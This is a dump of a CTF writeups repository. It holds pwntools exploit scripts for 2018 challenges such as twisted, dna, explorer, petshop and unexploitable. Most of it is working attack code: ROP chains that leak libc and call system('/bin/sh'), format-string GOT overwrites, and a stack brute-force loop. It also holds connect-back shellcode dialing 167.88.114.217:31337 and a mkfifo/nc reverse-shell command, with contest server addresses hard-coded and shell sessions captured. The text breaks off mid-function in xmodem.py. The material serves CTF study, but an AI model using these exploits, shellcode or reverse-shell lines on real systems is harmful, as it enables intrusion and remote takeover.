offset_sh = 0x15902b 9 | offset_printf = 0x49020 10 | HOST = '34.218.199.37' 11 | PORT = 6000 12 | r1 = process("./twisted_patched", env={"LD_PRELOAD":"./libc.so.6"}) 13 | r2 = remote(HOST,PORT) 14 | 15 | 16 | for i in xrange(312): 17 | question1 = r1.recvuntil("\n").split("=")[0] 18 | question2 = r2.recvuntil("\n").split("=")[0] 19 | if question1!=question2: 20 | print "Fail" 21 | return 22 | answer = eval(question1) 23 | r1.sendline(str(answer)) 24 | r2.sendline(str(answer)) 25 | 26 | fgets_buff = 0x08048979 27 | puts_plt = 0x080484E0 28 | printf_got = 0x804a00c 29 | bss = 0x804b000-0x100 30 | r1.recvuntil("Bot Verification Complete!\n") 31 | r2.recvuntil("Bot Verification Complete!\n") 32 | r2.recvuntil("Enter your message below :\n") 33 | canary = u32(r1.recv(4)) # patched local 
binary -> puts(canary) 34 | """ 35 | .text:08048961 push offset dword_804AA28 ; Keypatch modified this from: 36 | .text:08048961 ; push offset aEnterYourMessa 37 | .text:08048966 call _puts 38 | """ 39 | log.info('canary: %#x' % canary) 40 | r2.send("1") 41 | payload = "A"*0x10 42 | payload += p32(canary) 43 | payload += p32(bss) # ebp 44 | payload += p32(puts_plt) 45 | payload += p32(fgets_buff) 46 | payload += p32(printf_got) 47 | raw_input("?") 48 | r2.sendline(payload) 49 | printf = u32(r2.recv(4)) 50 | baselibc = printf - offset_printf 51 | system = baselibc + offset_system 52 | sh = baselibc + offset_sh 53 | log.info('libc: %#x' % baselibc) 54 | log.info('system: %#x' % system) 55 | log.info('sh: %#x' % sh) 56 | log.info('printf: %#x' % printf) 57 | 58 | payload = "A"*0x10 59 | payload += p32(canary) 60 | payload += p32(bss) # ebp 61 | payload += p32(system) 62 | payload += p32(fgets_buff) 63 | payload += p32(sh) 64 | raw_input("?") 65 | r2.sendline(payload) 66 | r2.interactive() 67 | 68 | twisted(sys.argv[1]) -------------------------------------------------------------------------------- /2018/bytebandit/twisted/twisted_local.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | import time 3 | import sys 4 | 5 | def twisted(DEBUG): 6 | t = 0.3 7 | offset_system = 0x3a940 8 | offset_sh = 0x15902b 9 | offset_printf = 0x49020 10 | if DEBUG=="1": 11 | t = 0.005 12 | r = process("./twisted_patched") 13 | raw_input("debug?") 14 | elif DEBUG=="2": 15 | r = process("./twisted_patched", env={"LD_PRELOAD":"./libc.so.6"}) 16 | raw_input("debug?") 17 | elif DEBUG=="3": 18 | HOST = '34.218.199.37' 19 | PORT = 6000 20 | r = remote(HOST,PORT) 21 | 22 | for i in xrange(312): 23 | question = r.recvuntil("\n").split("=")[0] 24 | answer = eval(question) 25 | print question, answer 26 | r.sendline(str(answer)) 27 | 28 | fgets_buff = 0x08048979 29 | puts_plt = 0x080484E0 30 | printf_got = 0x804a00c 31 | bss = 
0x804b000-0x100 32 | r.recvuntil("Bot Verification Complete!\n") 33 | canary = u32(r.recv(4)) 34 | log.info('canary: %#x' % canary) 35 | r.recv(1) 36 | r.send("1") 37 | payload = "A"*0x10 38 | payload += p32(canary) 39 | payload += p32(bss) # ebp 40 | payload += p32(puts_plt) 41 | payload += p32(fgets_buff) 42 | payload += p32(printf_got) 43 | raw_input("?") 44 | r.sendline(payload) 45 | printf = u32(r.recv(4)) # patched local binary -> puts(canary) 46 | """ 47 | .text:08048961 push offset dword_804AA28 ; Keypatch modified this from: 48 | .text:08048961 ; push offset aEnterYourMessa 49 | .text:08048966 call _puts 50 | """ 51 | baselibc = printf - offset_printf 52 | system = baselibc + offset_system 53 | sh = baselibc + offset_sh 54 | log.info('libc: %#x' % baselibc) 55 | log.info('system: %#x' % system) 56 | log.info('sh: %#x' % sh) 57 | log.info('printf: %#x' % printf) 58 | 59 | payload = "A"*0x10 60 | payload += p32(canary) 61 | payload += p32(bss) # ebp 62 | payload += p32(system) 63 | payload += p32(fgets_buff) 64 | payload += p32(sh) 65 | raw_input("?") 66 | r.sendline(payload) 67 | r.interactive() 68 | 69 | twisted(sys.argv[1]) -------------------------------------------------------------------------------- /2018/bytebandit/twisted/twisted_patched: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/phieulang1993/ctf-writeups/5bb6f55d4adab141a66455382522b5a0e73043a7/2018/bytebandit/twisted/twisted_patched -------------------------------------------------------------------------------- /2018/insecurity-insa/Gcorp Stage 2/dna: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/phieulang1993/ctf-writeups/5bb6f55d4adab141a66455382522b5a0e73043a7/2018/insecurity-insa/Gcorp Stage 2/dna -------------------------------------------------------------------------------- /2018/insecurity-insa/Gcorp Stage 2/dna.py: 
-------------------------------------------------------------------------------- 1 | from pwn import * 2 | import time 3 | import sys 4 | import random 5 | 6 | def dna(DEBUG): 7 | t = 0.3 8 | table = ["AAAA", "AAAC", "AAAG", "AAAT", "AACA", "AACC", "AACG", "AACT", "AAGA", "AAGC", "AAGG", "AAGT", "AATA", "AATC", "AATG", "AATT", "ACAA", "ACAC", "ACAG", "ACAT", "ACCA", "ACCC", "ACCG", "ACCT", "ACGA", "ACGC", "ACGG", "ACGT", "ACTA", "ACTC", "ACTG", "ACTT", "AGAA", "AGAC", "AGAG", "AGAT", "AGCA", "AGCC", "AGCG", "AGCT", "AGGA", "AGGC", "AGGG", "AGGT", "AGTA", "AGTC", "AGTG", "AGTT", "ATAA", "ATAC", "ATAG", "ATAT", "ATCA", "ATCC", "ATCG", "ATCT", "ATGA", "ATGC", "ATGG", "ATGT", "ATTA", "ATTC", "ATTG", "ATTT", "CAAA", "CAAC", "CAAG", "CAAT", "CACA", "CACC", "CACG", "CACT", "CAGA", "CAGC", "CAGG", "CAGT", "CATA", "CATC", "CATG", "CATT", "CCAA", "CCAC", "CCAG", "CCAT", "CCCA", "CCCC", "CCCG", "CCCT", "CCGA", "CCGC", "CCGG", "CCGT", "CCTA", "CCTC", "CCTG", "CCTT", "CGAA", "CGAC", "CGAG", "CGAT", "CGCA", "CGCC", "CGCG", "CGCT", "CGGA", "CGGC", "CGGG", "CGGT", "CGTA", "CGTC", "CGTG", "CGTT", "CTAA", "CTAC", "CTAG", "CTAT", "CTCA", "CTCC", "CTCG", "CTCT", "CTGA", "CTGC", "CTGG", "CTGT", "CTTA", "CTTC", "CTTG", "CTTT", "GAAA", "GAAC", "GAAG", "GAAT", "GACA", "GACC", "GACG", "GACT", "GAGA", "GAGC", "GAGG", "GAGT", "GATA", "GATC", "GATG", "GATT", "GCAA", "GCAC", "GCAG", "GCAT", "GCCA", "GCCC", "GCCG", "GCCT", "GCGA", "GCGC", "GCGG", "GCGT", "GCTA", "GCTC", "GCTG", "GCTT", "GGAA", "GGAC", "GGAG", "GGAT", "GGCA", "GGCC", "GGCG", "GGCT", "GGGA", "GGGC", "GGGG", "GGGT", "GGTA", "GGTC", "GGTG", "GGTT", "GTAA", "GTAC", "GTAG", "GTAT", "GTCA", "GTCC", "GTCG", "GTCT", "GTGA", "GTGC", "GTGG", "GTGT", "GTTA", "GTTC", "GTTG", "GTTT", "TAAA", "TAAC", "TAAG", "TAAT", "TACA", "TACC", "TACG", "TACT", "TAGA", "TAGC", "TAGG", "TAGT", "TATA", "TATC", "TATG", "TATT", "TCAA", "TCAC", "TCAG", "TCAT", "TCCA", "TCCC", "TCCG", "TCCT", "TCGA", "TCGC", "TCGG", "TCGT", "TCTA", "TCTC", "TCTG", "TCTT", 
"TGAA", "TGAC", "TGAG", "TGAT", "TGCA", "TGCC", "TGCG", "TGCT", "TGGA", "TGGC", "TGGG", "TGGT", "TGTA", "TGTC", "TGTG", "TGTT", "TTAA", "TTAC", "TTAG", "TTAT", "TTCA", "TTCC", "TTCG", "TTCT", "TTGA", "TTGC", "TTGG", "TTGT", "TTTA", "TTTC", "TTTG", "TTTT"] 9 | def genPayload(payload): 10 | res = "" 11 | for c in payload: 12 | res+=table[ord(c)] 13 | return res 14 | 15 | if DEBUG=="1": 16 | t = 0.005 17 | r = process("./dna") 18 | raw_input("debug?") 19 | command = "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 0 8 >/tmp/f" # 0 = 127.0.0.1 20 | data = "A"*0x80 21 | data += command 22 | data += "\x00" 23 | payload = genPayload(data) 24 | r.sendline(payload) 25 | r.interactive() 26 | 27 | 28 | dna(sys.argv[1]) 29 | """ 30 | $ python dna.py 1 31 | [+] Starting local process './dna': pid 2854 32 | debug? 33 | [*] Switching to interactive mode 34 | $ 35 | """ 36 | """ 37 | $ sudo nc -lvvp 8 38 | Listening on [0.0.0.0] (family 0, port 8) 39 | Connection from [127.0.0.1] port 8 [tcp/*] accepted (family 2, sport 41104) 40 | $ cat flag.txt 41 | NSA{1fb977db25976d7e1a0fb713383de1cea90b2d15b4173708d867be3793571ed9} 42 | $ 43 | """ -------------------------------------------------------------------------------- /2018/matesctf_pwn/bmhh/bmhh: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/phieulang1993/ctf-writeups/5bb6f55d4adab141a66455382522b5a0e73043a7/2018/matesctf_pwn/bmhh/bmhh -------------------------------------------------------------------------------- /2018/matesctf_pwn/bmhh/bmhh.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | import time 3 | import sys 4 | 5 | def bmhh(DEBUG): 6 | t = 0.3 7 | 8 | if DEBUG=="1": 9 | t = 0.005 10 | r = process("./bmhh") 11 | raw_input("debug?") 12 | elif DEBUG=="2": 13 | HOST = '125.235.240.168' 14 | PORT = 17357 15 | r = remote(HOST,PORT) 16 | 17 | def Add(ManOrWoman, name, age, desc): 18 | 
r.sendline("1") 19 | r.recvuntil("> ") 20 | r.sendline(str(ManOrWoman)) 21 | r.recvuntil("Name: ") 22 | r.sendline(name) 23 | r.recvuntil("Age: ") 24 | r.sendline(str(age)) 25 | r.recvuntil("Description: ") 26 | r.sendline(desc) 27 | return r.recvuntil("> ") 28 | 29 | def Replace(ManOrWoman, name, age, desc, idx): 30 | r.sendline("1") 31 | r.recvuntil("> ") 32 | r.sendline(str(ManOrWoman)) 33 | r.recvuntil("Name: ") 34 | r.sendline(name) 35 | r.recvuntil("Age: ") 36 | r.sendline(str(age)) 37 | r.recvuntil("Description: ") 38 | r.sendline(desc) 39 | r.recvuntil("> ") 40 | r.sendline(str(idx)) 41 | return r.recvuntil("> ") 42 | 43 | def View(idx): 44 | r.sendline("2") 45 | res = r.recvuntil("> ") 46 | r.sendline(str(idx)) 47 | res2 = r.recvuntil("> ") 48 | return res+res2 49 | 50 | def Edit(idx, typeInfo, info): 51 | r.sendline("3") 52 | res = r.recvuntil("> ") 53 | r.sendline(str(idx)) 54 | r.recvuntil("> ") # Chon thong tin muon sua: 55 | r.sendline(str(typeInfo)) # 1. Name | 2. Age | 3. 
Description 56 | if typeInfo==1: 57 | r.recvuntil("Name: ") 58 | r.sendline(str(info)) 59 | elif typeInfo==2: 60 | r.recvuntil("Age: ") 61 | r.sendline(str(info)) 62 | elif typeInfo==3: 63 | r.recvuntil("Description: ") 64 | r.sendline(str(info)) 65 | r.recvuntil("> ") 66 | return res 67 | 68 | def GhepDoi(): 69 | r.sendline("4") 70 | return r.recvuntil("> ") 71 | 72 | def HappyEnding(idx): 73 | r.sendline("5") 74 | r.recvuntil("> ") 75 | r.sendline(str(idx)) 76 | r.recvuntil("> ") 77 | r.sendline("1") 78 | return r.recvuntil("> ") 79 | 80 | atoi_got = 0x603078 81 | 82 | FLAG = 0x603440-0x238 83 | r.recvuntil("> ") 84 | name = "A"*0x30 85 | age = 0x1234 86 | desc1 = "1"*0xfe 87 | Add(1, name, age, desc1) 88 | 89 | name = "C"*0x30 90 | age = 0x5678 91 | desc = "2"*0xbe 92 | desc += p64(FLAG) 93 | desc += "4"*0x138 94 | Add(2, name, age, desc) 95 | N = ord("C") 96 | Add(2, chr(N)*0x30, age, desc) 97 | N+=1 98 | Add(2, chr(N)*0x30, age, desc) 99 | N+=1 100 | Add(2, chr(N)*0x30, age, desc) 101 | N+=1 102 | Add(2, chr(N)*0x30, age, desc) 103 | N+=1 104 | Add(2, chr(N)*0x30, age, desc) 105 | N+=1 106 | Add(2, chr(N)*0x30, age, desc) 107 | N+=1 108 | Add(2, chr(N)*0x30, age, desc) 109 | N+=1 110 | Add(2, chr(N)*0x30, age, desc) 111 | N+=1 112 | Add(2, chr(N)*0x30, age, desc) 113 | N+=1 114 | 115 | while 1: 116 | res = GhepDoi() 117 | if "Chuc hai ban hen ho vui ve:" in res: 118 | break 119 | time.sleep(0.01) 120 | 121 | HappyEnding(1) 122 | desc = "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9"+p64(FLAG)+"2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9" 123 | Replace(2, 
"Z"*0x30, 0x5432, desc , 1) 124 | 125 | Replace(1, "X"*0x30, 0x4321, "4"*0xfe, 2) 126 | r.sendline("5") 127 | r.sendline("2") 128 | r.sendline("1") 129 | r.interactive() 130 | 131 | bmhh(sys.argv[1]) 132 | 133 | """ 134 | define ff 135 | echo ============== LIST_PLAYER:\n 136 | telescope 0x603460 10 137 | echo ============== LIST_TYPE:\n 138 | telescope 0x6034c0 10 139 | echo ============================\n 140 | end 141 | 142 | define fa 143 | telescope 0x603460 20 144 | end 145 | """ 146 | # mastesctf{W3lld0ne_Expl0it_4s_e4sy_4s_pi3} -------------------------------------------------------------------------------- /2018/matesctf_pwn/echo/echo: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/phieulang1993/ctf-writeups/5bb6f55d4adab141a66455382522b5a0e73043a7/2018/matesctf_pwn/echo/echo -------------------------------------------------------------------------------- /2018/matesctf_pwn/echo/echo.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | import time 3 | import sys 4 | context.clear(arch = 'amd64') 5 | def echo(DEBUG): 6 | if DEBUG=="1": 7 | r = process("./echo") 8 | raw_input("debug?") 9 | elif DEBUG=="2": 10 | HOST = '125.235.240.168' 11 | PORT = 27015 12 | r = remote(HOST,PORT) 13 | 14 | 15 | puts_got = 0x601018 16 | flag = 0x4007B6 17 | offset = 8+3 18 | payload = "%1974u"+"%"+str(offset)+"$hn" 19 | payload += "%1000000000x" # >10s => alarm 20 | payload += p64(puts_got) 21 | r.sendline(payload) # puts_got -> flag 22 | 23 | r.interactive() 24 | 25 | echo(sys.argv[1]) 26 | 27 | # matesctf{How_Can_You_Escape_My_Special_Exit_Function?} -------------------------------------------------------------------------------- /2018/matesctf_pwn/explorer/explorer: -------------------------------------------------------------------------------- 
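# https://raw.githubusercontent.com/phieulang1993/ctf-writeups/5bb6f55d4adab141a66455382522b5a0e73043a7/2018/matesctf_pwn/explorer/explorer  (binary, not shown)
# -------------------------------------------------------------------------------- /2018/matesctf_pwn/explorer/explorer.py:
# --------------------------------------------------------------------------------
from pwn import *
import time
import sys
context.clear(arch = 'amd64')


def explorer(DEBUG):
    """Two-stage ROP exploit for ``explorer`` (MatesCTF 2018): leak libc, then system("/bin/sh").

    Args:
        DEBUG: "1" runs ./explorer locally and pauses so a debugger can attach;
               "2" connects to the contest server.  Anything else raises ValueError
               (the original fell through and later died on an unbound ``r``).

    Both stages overflow the same stack buffer: 0x10 bytes of buffer, 8 bytes of saved
    rbp, then a ROP chain.  Stage 1 does puts(atoi@got) and returns into main so the
    buffer can be overflowed a second time; stage 2 does system("/bin/sh") with addresses
    derived from that leak.  The libc offsets are those of the remote libc; against a
    different libc the computed base will not be page-aligned and the script stops at the
    sanity check instead of jumping to garbage.
    """
    if DEBUG == "1":
        r = process("./explorer")
        raw_input("debug?")
    elif DEBUG == "2":
        HOST = '125.235.240.168'
        PORT = 27016
        r = remote(HOST, PORT)
    else:
        raise ValueError("DEBUG must be '1' (local) or '2' (remote), got %r" % (DEBUG,))

    # addresses inside the target binary
    atoi_got = 0x161F020
    puts_plt = 0x400640
    main = 0xd40a28
    pop_rdi_ret = 0x462b47
    # remote libc offsets
    offset_atoi = 0x36E80
    offset_system = 0x45390
    offset_sh = 0x18CD57
    castle_num = 42590

    def call_with_rdi(func, arg):
        """ROP fragment ``pop rdi; ret`` -> arg -> func, i.e. func(arg)."""
        return p64(pop_rdi_ret) + p64(arg) + p64(func)

    def smash(chain):
        """Answer the castle prompt, send the second 8-byte field, then overflow the buffer with ``chain``."""
        r.recvuntil("Castle number: ")
        r.send(str(castle_num).ljust(8, "\x00"))
        r.send("nSGDGJV\x00")
        payload = "A" * 0x10   # buffer
        payload += "B" * 8     # saved rbp
        payload += chain
        r.sendline(payload)

    # stage 1: puts(atoi@got) to leak libc, then re-enter main for a second overflow
    smash(call_with_rdi(puts_plt, atoi_got) + p64(main))
    r.recvuntil("GET IT?\n")
    # recvn, not recv: a short read here would silently become a wrong address
    res = r.recvn(6)
    atoi = u64(res.ljust(8, "\x00"))
    baselibc = atoi - offset_atoi
    if baselibc & 0xfff:
        # libc is mmap'd page-aligned; an unaligned base means the leak or the offsets are wrong
        log.error('bad leak: atoi=%#x gives unaligned libc base %#x' % (atoi, baselibc))
    system = baselibc + offset_system
    sh = baselibc + offset_sh
    log.info('baselibc: %#x' % baselibc)
    log.info('system: %#x' % system)
    log.info('sh: %#x' % sh)
    log.info('atoi: %#x' % atoi)

    # stage 2: system("/bin/sh")
    smash(call_with_rdi(system, sh))
    r.interactive()


explorer(sys.argv[1])
# matesctf{Ahihi_Ohoho_H2+O2=HOHO_You_Found_My_Flag}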
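# -------------------------------------------------------------------------------- /2018/matesctf_pwn/harrypotter/harrypotter:  (binary, not shown)
# https://raw.githubusercontent.com/phieulang1993/ctf-writeups/5bb6f55d4adab141a66455382522b5a0e73043a7/2018/matesctf_pwn/harrypotter/harrypotter
# -------------------------------------------------------------------------------- /2018/matesctf_pwn/harrypotter/harrypotter.py:
# --------------------------------------------------------------------------------
from pwn import *


def harrypotter(max_attempts=None):
    """Brute-force a partial stack address to read the flag through a format-string bug.

    The payload is ``%12$s`` padded to 0x30 bytes plus two bytes that overwrite the low
    1.5 bytes of a stack pointer (author's note: "bruteforce 1.5 bytes stack").  ASLR
    randomises the stack, so the guess only hits sometimes; the script reconnects until the
    response contains a non-empty ``matesctf{...}``.

    Args:
        max_attempts: give up (returning None) after this many connections;
                      None retries forever, which is what the original did.

    Returns:
        the response that contained the flag, or None if max_attempts ran out.

    Only the errors a missed guess produces (the target crashing and the connection
    dying: EOFError / socket IOError) are swallowed.  The original used a bare ``except:``,
    which also ate KeyboardInterrupt and made the loop impossible to stop with Ctrl-C.
    """
    HOST = '125.235.240.168'
    PORT = 27017

    def connect():
        # return process("./harrypotter")
        return remote(HOST, PORT)

    context.log_level = "critical"
    payload = "%12$s".ljust(0x30, "B")
    payload += "\xf0\x95"  # bruteforce 1.5 bytes stack: guessed low bytes of the address %12$s dereferences

    count = 0
    while max_attempts is None or count < max_attempts:
        print(count)
        count += 1
        r = connect()
        try:
            # the banner read is inside the try as well: a dead connection here used to crash the loop
            r.recvuntil("It's time to cast your spell\n")
            r.send(payload)
            res = r.recv()
        except (EOFError, IOError):
            # wrong guess -> target crashed and closed the socket; just try again
            r.close()
            continue
        r.close()
        if "matesctf{" in res and "matesctf{}" not in res:
            print(res)
            return res
    return None


harrypotter()
# matesctf{wingalium_leviosaaaaaaaaaaaaaaaaaaaaaaa_hahaha}
# -------------------------------------------------------------------------------- /2018/matesctf_pwn/petshop/petshop:  (binary, not shown)
# https://raw.githubusercontent.com/phieulang1993/ctf-writeups/5bb6f55d4adab141a66455382522b5a0e73043a7/2018/matesctf_pwn/petshop/petshop
# -------------------------------------------------------------------------------- /2018/matesctf_pwn/petshop/petshop.py:
# --------------------------------------------------------------------------------
from pwn import *
import time
import sys


def petshop(DEBUG):
    """Type-confusion exploit for ``petshop`` (MatesCTF 2018).

    Per the author's notes, feeding a pet particular cup counts changes the pet's type
    (cat -> fish -> dog).  A dog's colour is a 6-byte field with no terminator, so Show()
    prints the colour followed by the 8 bytes after it: a code pointer into the PIE binary
    (author's offsets: base = ptr - 0x159d, system = base + 0x1583).  The same colour write
    then overwrites that pointer with system, and the fish "area" input supplies "/bin/sh".

    Args:
        DEBUG: "1" runs ./petshop locally and pauses for a debugger; "2" connects to the
               contest server.  Anything else raises ValueError (the original fell through
               to an unbound ``r``).
    """
    if DEBUG == "1":
        r = process("./petshop")
        raw_input("debug?")
    elif DEBUG == "2":
        HOST = '125.235.240.168'
        PORT = 26000
        r = remote(HOST, PORT)
    else:
        raise ValueError("DEBUG must be '1' (local) or '2' (remote), got %r" % (DEBUG,))

    def Buy(petType, color=1, name="BBBB"):
        """Menu 1: buy a pet of petType (1. Dog | 2. Cat | 3. Fish); cats also get a colour."""
        r.sendline("1")
        r.recvuntil("3. Fish")
        r.sendline(str(petType))
        if petType == 2:
            r.recvuntil("2. White")
            r.sendline(str(color))
        r.recvuntil("Enter pet name:")
        r.sendline(name)
        return r.recvuntil("Your choice: ")

    def Feed(idx, cups):
        """Menu 2: feed pet idx ``cups`` cups (the value that, per the author, flips the type)."""
        r.sendline("2")
        r.recvuntil("Enter pet number:")
        r.sendline(str(idx))
        r.recvuntil("How many cups of food? ")
        r.sendline(str(cups))
        return r.recvuntil("Your choice: ")

    def Poop(idx):
        """Menu 3: unused by the exploit, kept for completeness."""
        r.sendline("3")
        r.recvuntil("Enter pet number:")
        r.sendline(str(idx))
        return r.recvuntil("Your choice: ")

    def Show():
        """Menu 4: list the pets; the raw output is where the pointer leaks."""
        r.sendline("4")
        return r.recvuntil("Your choice: ")

    def Play(idx):
        r.sendline("5")
        r.recvuntil("Enter pet number:")
        r.sendline(str(idx))

    def PlayDog(idx, color):
        """Menu 5 on a dog: set the 6-byte colour (sendline adds no terminator inside the field)."""
        Play(idx)
        r.recvuntil("Change color?(Y/N) ")
        r.sendline("Y")
        r.sendline(color)
        return r.recvuntil("Your choice: ")

    def PlayFish(idx, isTrain, area):
        """Menu 5 on a fish: optionally train it, then send the area string (no menu read afterwards)."""
        Play(idx)
        r.recvuntil("Train your fish?(Y/N) ")
        r.sendline("Y" if isTrain else "N")
        r.recvuntil("Enter area:")
        r.sendline(area)

    dec = 0xff00
    inc = 0x100

    r.recvuntil("Your choice: ")
    Buy(2, 1, "A" * 0xff)
    Feed(1, inc)         # 2 -> 3 Fish (author's note)
    PlayFish(1, True, "")
    Feed(1, dec * 2)     # 3 -> 1 Dog (author's note)
    PlayDog(1, "X" * 6)  # marker colour so the leaked bytes can be located in Show() output
    res = Show()
    if "XXXXXX" not in res:
        log.error("colour marker not found in Show() output, leak failed:\n%r" % (res,))
    # take exactly six bytes after the marker: the original used splitlines()[0], which
    # silently truncates the address whenever one of its bytes happens to be 0x0a
    leak = res.split("XXXXXX", 1)[1][:6]
    func = u64(leak.ljust(8, "\x00"))
    base = func - 0x159d
    system = base + 0x1583
    if base & 0xfff:
        # a PIE image is mapped page-aligned; anything else means the leak is garbage
        log.error("leaked pointer %#x gives unaligned PIE base %#x" % (func, base))
    log.info('base: %#x' % base)
    log.info('system: %#x' % system)
    log.info('func: %#x' % func)

    # overwrite the pointer that follows the colour with system, then have the fish
    # path call it with "/bin/sh" as its argument
    PlayDog(1, "B" * 6 + p64(system))
    Feed(1, inc * 2)     # 1 -> 3 Fish (author's note)
    PlayFish(1, False, "/bin/sh")

    r.interactive()


petshop(sys.argv[1])

"""
define ff
echo ============== LIST_ANIMAL:\n
telescope 0x555555757080 10
echo ============== COUNT:\n
telescope 0x5555557570D0 1
echo ============================\n
end

define fa
x/40gx {long}0x555555757080-0x10
end
define fa
telescope {long}0x555555757080-0x10
end

struct __attribute__((aligned(8))) animal
{
 _QWORD FUNC;
 _WORD cups;
 char name[8];
 char color[6];
 _QWORD Active;
};
"""
"""
$ python petshop.py 2
[+] Opening connection to 125.235.240.168 on port 26000: Done
[*] base: 0x559c9fc69000
[*] system: 0x559c9fc6a583
[*] func: 0x559c9fc6a59d
[*] Switching to interactive mode
$ id
uid=1006(petshop) gid=1006(petshop) groups=1006(petshop)
$ ls
flag
petshop
run.sh
$ cat flag
mastesctf{lovely_pets}
$
"""
# -------------------------------------------------------------------------------- /2018/matesctf_pwn/unexploitable/payload:  (binary, not shown)
# https://raw.githubusercontent.com/phieulang1993/ctf-writeups/5bb6f55d4adab141a66455382522b5a0e73043a7/2018/matesctf_pwn/unexploitable/payload
# -------------------------------------------------------------------------------- /2018/matesctf_pwn/unexploitable/vuln_app:  (binary, not shown)
# https://raw.githubusercontent.com/phieulang1993/ctf-writeups/5bb6f55d4adab141a66455382522b5a0e73043a7/2018/matesctf_pwn/unexploitable/vuln_app
# -------------------------------------------------------------------------------- /2018/matesctf_pwn/unexploitable/vuln_app.py: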
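# --------------------------------------------------------------------------------
from pwn import *
import time
import sys
context.arch = "amd64"


def vuln_app(DEBUG, ip="167.88.114.217", port=31337):
    """Stage a connect-back shell into the ``unexploitable`` binary (MatesCTF 2018).

    Args:
        DEBUG: "1" runs ./vuln_app locally and pauses for a debugger; any other value
               raises ValueError (the original fell through to an unbound ``r``).
        ip, port: where the shellcode dials back to.  The defaults are the values that
               were hard-coded as raw bytes inside the original shellcode
               (167.88.114.217:31337); a listener must be waiting there.

    The first payload overflows the 0xc-byte buffer and returns into the raw ``syscall``
    gadget at 0x400341; the qwords after it are laid out as the author annotated them
    (rax=0 read, rdi=0 stdin, rsi=data, rdx=0x200) so that the process next performs
    read(0, data, 0x200) and continues at ``data``.  The second send fills that buffer with
    the shellcode.  Both are also written to ./payload so they can be replayed without
    this script.
    """
    import socket
    import struct

    if DEBUG == "1":
        r = process("./vuln_app")
        raw_input("debug?")
    else:
        raise ValueError("DEBUG must be '1' (local), got %r" % (DEBUG,))

    # connect-back shellcode: socket(AF_INET, SOCK_STREAM, 6) -> connect(ip:port)
    # -> dup2(sock, 2/1/0) -> execve("//bin/sh").  Address and port are patched in at
    # the same two places the original spliced its hard-coded bytes.
    IPADDR = socket.inet_aton(ip)       # 4 bytes, network order
    PORT = struct.pack(">H", port)      # 2 bytes, network order
    shellcode_connect = (
        "\x48\x31\xc0\x48\x31\xff\x48\x31\xf6\x48\x31\xd2\x4d\x31\xc0\x6a\x02\x5f\x6a\x01\x5e"
        "\x6a\x06\x5a\x6a\x29\x58\x0f\x05\x49\x89\xc0\x48\x31\xf6\x4d\x31\xd2\x41\x52\xc6\x04"
        "\x24\x02\x66\xc7\x44\x24\x02" + PORT +
        "\xc7\x44\x24\x04" + IPADDR +
        "\x48\x89\xe6\x6a\x10\x5a\x41\x50\x5f\x6a\x2a\x58\x0f\x05\x48\x31\xf6\x6a\x03\x5e\x48"
        "\xff\xce\x6a\x21\x58\x0f\x05\x75\xf6\x48\x31\xff\x57\x57\x5e\x5a\x48\xbf\x2f\x2f\x62"
        "\x69\x6e\x2f\x73\x68\x48\xc1\xef\x08\x57\x54\x5f\x6a\x3b\x58\x0f\x05"
    )
    shellcode = "\x90" * 0x50 + shellcode_connect
    shellcode = shellcode.ljust(0x200, "\x90")   # exactly the 0x200 bytes the staged read() asks for

    data = 0x601000
    syscall = 0x400341
    r.recvuntil("Now, the environment is also strict. Can you exploit me anyway?")
    payload = "A" * 0xc
    payload += p64(syscall)
    payload += p64(data)
    payload += p64(0)        # rax sysread
    payload += p64(0)        # rdi stdin
    payload += p64(data)     # rsi buf
    payload += p64(0x200)    # rdx nbytes
    # NOTE(review): the original had `payload.ljust(0x64, "\x00")` here with the result
    # discarded, so no padding was ever sent.  Deliberately not "fixed": extra bytes on the
    # stream would be swallowed by the staged read(0, data, 0x200) as the start of the
    # shellcode buffer, which is then executed.
    r.send(payload)
    r.send(shellcode)
    with open("payload", "wb") as f:
        f.write(payload + shellcode)

    r.interactive()


vuln_app(sys.argv[1])
 -------------------------------------------------------------------------------- /2018/matesctf_session3/round2/libc-2.23.so: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/phieulang1993/ctf-writeups/5bb6f55d4adab141a66455382522b5a0e73043a7/2018/matesctf_session3/round2/libc-2.23.so -------------------------------------------------------------------------------- /2018/matesctf_session3/round2/xmodem: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/phieulang1993/ctf-writeups/5bb6f55d4adab141a66455382522b5a0e73043a7/2018/matesctf_session3/round2/xmodem -------------------------------------------------------------------------------- /2018/matesctf_session3/round2/xmodem.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | import time 3 | import sys 4 | 5 | def chall(DEBUG): 6 | if DEBUG=="1": 7 | r = process("./chall") 8 | raw_input("debug?") 9 | elif DEBUG=="2": 10 | HOST = '42.117.243.201' 11 | PORT = 9999 12 | r = remote(HOST,PORT) 13 | 14 | def pause(): 15 | # raw_input("?") 16 | time.sleep(0.1) 17 | 18 | def Login(username, password): 19 | 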